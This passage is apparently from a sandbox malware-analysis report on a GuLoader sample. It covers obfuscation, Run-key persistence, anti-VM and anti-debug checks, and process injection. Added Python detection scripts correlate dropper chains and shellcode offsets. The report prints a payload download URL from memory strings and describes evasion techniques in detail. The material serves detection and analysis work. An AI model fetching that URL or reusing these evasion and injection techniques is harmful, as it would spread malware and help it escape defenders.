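# the trailing "Jump to behavior" link text is tolerated and dropped.
LINE_RE = re.compile(r"^Source: (.+?) Process created: (\S+) (.*?)(?: Jump to behavior)?$")
SCRIPT_EXT_RE = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|wsh)\b", re.I)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TEMP_DIR = "\\appdata\\local\\temp\\"
# Assumed list of user-writable locations a dropped payload tends to land in.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\", "\\programdata\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    """(parent, child, command line) triples; lines that are not process events are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m.group(1), m.group(2), m.group(3)))
    return events


def _walk(edges, node, cmd_hops, path, out):
    # Follow the script host's descendants; cmd.exe may sit in between (at most cmd_hops times).
    for nxt in sorted(edges.get(node, ())):
        if nxt in path:
            continue  # a binary re-launching itself is not a new hop
        low = nxt.lower()
        if basename(nxt) == "cmd.exe" and cmd_hops > 0:
            _walk(edges, nxt, cmd_hops - 1, path + [nxt], out)
        elif low.endswith(".exe") and any(d in low for d in USER_WRITABLE):
            chain = path + [nxt]
            if chain not in out:
                out.append(chain)


def find_dropper_chains(events):
    """Chains parent -> script host (script in %TEMP%) [-> cmd.exe] -> exe in a user-writable dir."""
    edges = defaultdict(set)
    for parent, child, _ in events:
        edges[parent].add(child)
    chains = []
    for parent, child, cmdline in events:
        if basename(child) not in SCRIPT_HOSTS:
            continue
        if TEMP_DIR not in cmdline.lower() or not SCRIPT_EXT_RE.search(cmdline):
            continue
        _walk(edges, child, 1, [parent, child], chains)
    return chains


def self_spawns(events):
    """Binaries that start a copy of themselves, the usual prelude to hollowing/injection."""
    return {child for parent, child, _ in events if parent.lower() == child.lower()}


if __name__ == "__main__":
    ev = parse_events(REPORT_LINES)
    for chain in find_dropper_chains(ev):
        print(" -> ".join(chain))
    print("self-spawning binaries:", sorted(self_spawns(ev)))
```

On this input the only chain reported is mU9H96igb3.exe -> wscript.exe -> cmd.exe -> Dlls.exe; conhost.exe, also a child of cmd.exe, is ignored because it lives under C:\Windows. The same functions work on EDR process-creation telemetry once it is rendered into the same three fields.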

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0041A474 push ebp; ret 2_2_0041A4CD
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040E9CB push ecx; retf 2_2_0040E9CC
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004191F0 push ecx; ret 2_2_004191F1
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004131A3 push ecx; ret 2_2_004132DD
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004086CE push eax; retf 2_2_004086CF
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00411ACE push ecx; ret 2_2_00411B05
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_004132DE push ecx; ret 2_2_0041331D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0041729D push edx; retf 2_2_004172A6
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040DAAA push ecx; ret 2_2_0040DAD5
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040E6B3 push ecx; ret 2_2_0040E6C1
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00417AB9 push eax; ret 2_2_00417AC3
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_0040A750 push ss; retf 2_2_0040A751
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00411B06 push ecx; ret 2_2_00411B05
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_00407B81 push esi; retf 2_2_00407B83
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE267D push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C04084 push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE2A10 push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE1611 push esi; iretd 2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE67BC push es; ret 2_2_02BE67F4
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF6BF6 push FFFFFF94h; retf 2_2_02BE2B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE1327 push esi; iretd 2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE1366 push esi; iretd 2_2_02BE167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0056267D push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00584084 push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00562A10 push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00561611 push esi; iretd 9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00561366 push esi; iretd 9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00561327 push esi; iretd 9_2_0056167D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00576BF6 push FFFFFF94h; retf 9_2_00562B65
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_005667BC push es; ret 9_2_005667F4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_0041A474 push ebp; ret 15_2_0041A4CD

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\mU9H96igb3.exe File created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\mU9H96igb3.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Chrome
Source: C:\Users\user\Desktop\mU9H96igb3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome (2 occurrences)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process information set: NOOPENFILEERRORBOX (23 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process information set: NOOPENFILEERRORBOX (14 occurrences)

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\mU9H96igb3.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe (2 occurrences)
Source: C:\Users\user\Desktop\mU9H96igb3.exe File opened: C:\Program Files\qga\qga.exe (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe (6 occurrences)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe File opened: C:\Program Files\qga\qga.exe (6 occurrences)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmp Binary or memory string: TROGRAM FILES\QEMU-GA\QEMU-GA.EXET
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BINHTTP://IMPLANTECAPILARPEREIRA.COM/NETGENERATION10%20STARTUP_KCFPCD130.BIN
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708 Thread sleep count: 9188 > 30
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe TID: 7708 Thread sleep time: -45940s >= -30000s
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread sleep count: Count: 9188 delay: -5
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFFBA1 rdtsc 2_2_02BFFBA1
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Window / User API: threadDelayed 9188
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Window / User API: foregroundWindowGot 478
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\mU9H96igb3.exe System information queried: ModuleInformation
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmp Binary or memory string: trogram Files\Qemu-ga\qemu-ga.exet
Source: Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWw4
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: mU9H96igb3.exe, 00000009.00000002.137983452106.00000000009A5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW(<
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: mU9H96igb3.exe, 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Dlls.exe, 00000014.00000002.139081030100.00000000007C5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW :WA
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Thread information set: HideFromDebugger (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Thread information set: HideFromDebugger (6 occurrences)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFFBA1 rdtsc 2_2_02BFFBA1
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF46A0 mov eax, dword ptr fs:[00000030h] 2_2_02BF46A0
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C01BCE mov eax, dword ptr fs:[00000030h] 2_2_02C01BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFC054 mov eax, dword ptr fs:[00000030h] 2_2_02BFC054
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFE990 mov eax, dword ptr fs:[00000030h] 2_2_02BFE990
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057C054 mov eax, dword ptr fs:[00000030h] 9_2_0057C054
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_005746A0 mov eax, dword ptr fs:[00000030h] 9_2_005746A0
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00581BCE mov eax, dword ptr fs:[00000030h] 9_2_00581BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057E990 mov eax, dword ptr fs:[00000030h] 9_2_0057E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C246A0 mov eax, dword ptr fs:[00000030h] 15_2_02C246A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C31BCE mov eax, dword ptr fs:[00000030h] 15_2_02C31BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2C054 mov eax, dword ptr fs:[00000030h] 15_2_02C2C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2E990 mov eax, dword ptr fs:[00000030h] 15_2_02C2E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F646A0 mov eax, dword ptr fs:[00000030h] 17_2_04F646A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6C054 mov eax, dword ptr fs:[00000030h] 17_2_04F6C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F71BCE mov eax, dword ptr fs:[00000030h] 17_2_04F71BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6E990 mov eax, dword ptr fs:[00000030h] 17_2_04F6E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235C054 mov eax, dword ptr fs:[00000030h] 18_2_0235C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_023546A0 mov eax, dword ptr fs:[00000030h] 18_2_023546A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235E990 mov eax, dword ptr fs:[00000030h] 18_2_0235E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02361BCE mov eax, dword ptr fs:[00000030h] 18_2_02361BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057C054 mov eax, dword ptr fs:[00000030h] 20_2_0057C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_005746A0 mov eax, dword ptr fs:[00000030h] 20_2_005746A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00581BCE mov eax, dword ptr fs:[00000030h] 20_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057E990 mov eax, dword ptr fs:[00000030h] 20_2_0057E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057C054 mov eax, dword ptr fs:[00000030h] 21_2_0057C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_005746A0 mov eax, dword ptr fs:[00000030h] 21_2_005746A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00581BCE mov eax, dword ptr fs:[00000030h] 21_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057E990 mov eax, dword ptr fs:[00000030h] 21_2_0057E990
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process queried: DebugPort (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process queried: DebugPort (6 occurrences)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF742D LdrInitializeThunk, 2_2_02BF742D
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0058474A RtlAddVectoredExceptionHandler, 9_2_0058474A
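Three classic anti-debug checks appear in this section: HideFromDebugger is NtSetInformationThread(ThreadHideFromDebugger), DebugPort is NtQueryInformationProcess(ProcessDebugPort), and "mov eax, fs:[30h]" reads the PEB on 32-bit Windows (BeingDebugged and NtGlobalFlag live there). What is more useful than the checks themselves is where they sit. In every process the four PEB-reading functions are at the same offsets from that process's "Yara detected GuLoader" memory region (listed under Data Obfuscation above); only the base differs (0x2BE0000 in process 2, 0x560000 in process 9, 0x2C10000 in process 15, and so on), and every one of those regions has protection 0x40, PAGE_EXECUTE_READWRITE. That is one shellcode blob injected into each child, not code compiled into Dlls.exe. The Python below is an added example, not part of the report, that performs this correlation from the report's own lines; the dump-name field layout (process index, then base address and protection, hexadecimal) and the 1 MiB region-size cap are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed from this report: the seven "Yara detected GuLoader" memory-region names
# and the address labels of the "Contains functionality to read the PEB" code functions.
YARA_LINES = [
    "00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp",
    "0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmp",
    "00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp",
    "00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp",
    "00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp",
    "00000002.00000002.137587044438.0000000002BE0000.00000040.00000001.sdmp",
    "00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp",
]
CODE_LINES = [
    "2_2_02BF46A0 mov eax, dword ptr fs:[00000030h]", "2_2_02C01BCE", "2_2_02BFC054", "2_2_02BFE990",
    "9_2_0057C054", "9_2_005746A0", "9_2_00581BCE", "9_2_0057E990",
    "15_2_02C246A0", "15_2_02C31BCE", "15_2_02C2C054", "15_2_02C2E990",
    "17_2_04F646A0", "17_2_04F6C054", "17_2_04F71BCE", "17_2_04F6E990",
    "18_2_0235C054", "18_2_023546A0", "18_2_0235E990", "18_2_02361BCE",
    "20_2_0057C054", "20_2_005746A0", "20_2_00581BCE", "20_2_0057E990",
    "21_2_0057C054", "21_2_005746A0", "21_2_00581BCE", "21_2_0057E990",
    # a host-image address from the obfuscation section; it lies outside the blob and is filtered out
    "2_2_0041A474 push ebp; ret",
]

# Dump name: <process index>.<pass>.<timestamp>.<base address>.<protection>.<type>.sdmp (assumed layout).
SDMP_RE = re.compile(r"([0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.[0-9A-F]{8}\.sdmp")
# Code-function label: <process index>_<pass>_<virtual address>; here the index is decimal.
FUNC_RE = re.compile(r"\b(\d+)_\d+_([0-9A-F]{8})\b")
PAGE_EXECUTE_READWRITE = 0x40
MAX_REGION = 0x100000  # assumption: the injected blob is under 1 MiB


def parse_regions(lines):
    """{process index: (base address, page protection)} from the dump names."""
    regions = {}
    for line in lines:
        m = SDMP_RE.search(line)
        if m:
            regions[int(m.group(1), 16)] = (int(m.group(2), 16), int(m.group(3), 16))
    return regions


def parse_functions(lines):
    """{process index: set of virtual addresses} from the code-function labels."""
    funcs = defaultdict(set)
    for line in lines:
        m = FUNC_RE.search(line)
        if m:
            funcs[int(m.group(1))].add(int(m.group(2), 16))
    return funcs


def rebase(regions, funcs):
    """Per process, the function addresses as offsets into that process's Yara-flagged
    region; addresses outside the region (e.g. the VB6 host image) are dropped."""
    out = {}
    for pidx, addrs in funcs.items():
        if pidx not in regions:
            continue
        base, _ = regions[pidx]
        rvas = frozenset(a - base for a in addrs if 0 <= a - base < MAX_REGION)
        if rvas:
            out[pidx] = rvas
    return out


def one_blob_many_hosts(regions, funcs):
    """True when every process carries the same function offsets inside an RWX region:
    a single shellcode blob injected into each child rather than per-process code."""
    rvas = rebase(regions, funcs)
    all_rwx = all(regions[p][1] == PAGE_EXECUTE_READWRITE for p in rvas)
    return bool(rvas) and all_rwx and len(set(rvas.values())) == 1, rvas


if __name__ == "__main__":
    same, rvas = one_blob_many_hosts(parse_regions(YARA_LINES), parse_functions(CODE_LINES))
    print("same blob in every process:", same)
    for pidx, offsets in sorted(rvas.items()):
        print(pidx, sorted(hex(o) for o in offsets))
```

The offsets come out as 0x146A0, 0x1C054, 0x1E990 and 0x21BCE in all seven processes. The same rebasing turns the other per-process addresses in this report into stable offsets (the rdtsc at 2_2_02BFFBA1 is blob offset 0x1FBA1), which is what you want to key a memory signature or a hunting query on, since the base changes on every injection.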

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' (2 occurrences)
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program ManagerCJBCA\D
